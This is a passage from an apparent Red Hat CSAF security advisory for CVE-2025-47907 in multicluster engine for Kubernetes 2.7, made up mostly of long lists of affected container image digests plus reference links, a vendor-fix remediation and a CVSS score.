"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "RHBZ#2387083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://go.dev/cl/693735",
"url": "https://go.dev/cl/693735"
},
{
"category": "external",
"summary": "https://go.dev/issue/74831",
"url": "https://go.dev/issue/74831"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM",
"url": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3849",
"url": "https://pkg.go.dev/vuln/GO-2025-3849"
}
],
"release_date": "2025-08-07T15:25:30.704000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:23:47+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.12/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5636"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
